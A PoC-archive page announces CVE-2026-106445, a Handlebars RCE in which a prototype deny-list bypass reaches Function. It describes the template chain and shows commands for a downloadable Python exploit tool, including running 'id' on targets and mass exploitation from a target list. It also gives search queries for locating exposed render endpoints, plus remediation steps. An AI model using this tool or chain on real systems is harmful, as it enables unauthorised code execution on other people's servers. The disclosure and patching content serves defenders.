POCBIT

Telegram — New PoC releases & critical CVE alerts

You can join our Telegram channel to get instant updates on new PoC releases and critical CVE alerts.

Join @pocbit
Web appcritical

CVE-2026-106445 — Handlebars 4.0.0–4.7.9 RCE (Function.prototype.constructor Bypass)

October 10, 2026 · 37 views

handlebars 4.0.0–4.7.9: lookupProperty own-property order bypasses proto deny list → Function.prototype.constructor → sandbox escape when allowProtoMethodsByDefault:true and attacker-controlled compile (CWE-184/CWE-1289). CVSS 4.0 9.2 Critical AT:P. Fixed 4.7.10 GHSA-p8wg-vrv2-v86f. Python PoC: check/exploit, Docker lab, --render-path. Marker POCBIT-106445-OK.

#handlebars#nodejs#javascript#template-engine#sandbox-escape#cwe-184#cwe-1289#rce#critical#ghsa

CVE:

CVE-2026-106445

Date:

2026-10-10

Severity:

CRITICAL

Exploit source

Full PoC repository on GitHub (public).

Description

Overview

CVE-2026-106445 — Handlebars.js (handlebars) — remote code execution via Function.prototype.constructor own-property bypass when templates are compiled with allowProtoMethodsByDefault: true (CWE-184 / CWE-1289).

| | | |---|---| | Affected | 4.0.0 – 4.7.9 | | Fixed | 4.7.10 (GHSA-p8wg-vrv2-v86f) | | CVSS 4.0 | 9.2 Critical — AT:P (unsafe compile options + user template) | | Verify marker | POCBIT-106445-OK |

lookupProperty returns own properties before the proto deny list runs. On Function.prototype, constructor is own → resolves to Function. Attacker template + context function fn → Function(attackerCode)() via #each / apply.

Not every npm dependency install: the app must compile/render attacker-controlled templates with allowProtoMethodsByDefault: true (default in some hbs setups) and expose a function in the render context.

PoC page: https://pocbit.org/pocs/cve-2026-106445

GitHub: murrez/CVE-2026-106445

CVE.org: CVE-2026-106445

Bundled tool (Python 3)

Download cve-2026-106445.py — writes poc.py, requirements.txt, docker-compose.yml.

python cve-2026-106445.py
pip install -r requirements.txt

docker compose up --build -d   # lab on :13045 when lab/ tree present
python poc.py -u http://127.0.0.1:13045 --mode check
python poc.py -u http://127.0.0.1:13045 --mode exploit
python poc.py -u http://127.0.0.1:13045 --mode exploit -c "id"
python poc.py --mode payload -c "id"

python poc.py -u https://app.example --render-path /api/preview --mode exploit -c "id" --insecure
python poc.py --list targets.txt --mode exploit -j 10 --skip-check

Lab API (reference): GET /health, POST /render JSON {"template":"..."}, optional GET /render?template=... (**--use-get`).

Exploit sends the GHSA template chain; verify POCBIT-106445-OK (or command output) in JSON output.

Discovery hints (your assets only)

body="handlebars" && body="allowProtoMethodsByDefault"
body="/render" && body="template" && server="Node"

Confirm with --mode check on suspected preview/render APIs—not static handlebars.min.js pages.

Remediation

  1. Upgrade to [email protected]+.
  2. Disable allowProtoMethodsByDefault for untrusted templates.
  3. Never compile user-supplied Handlebars on server-side preview endpoints without sandbox hardening.

Legal and ethical use

Authorized security testing only.

References

Related PoCs

Same platform, vendor, or tags — explore more write-ups on Pocbit.

Browse full PoC archive →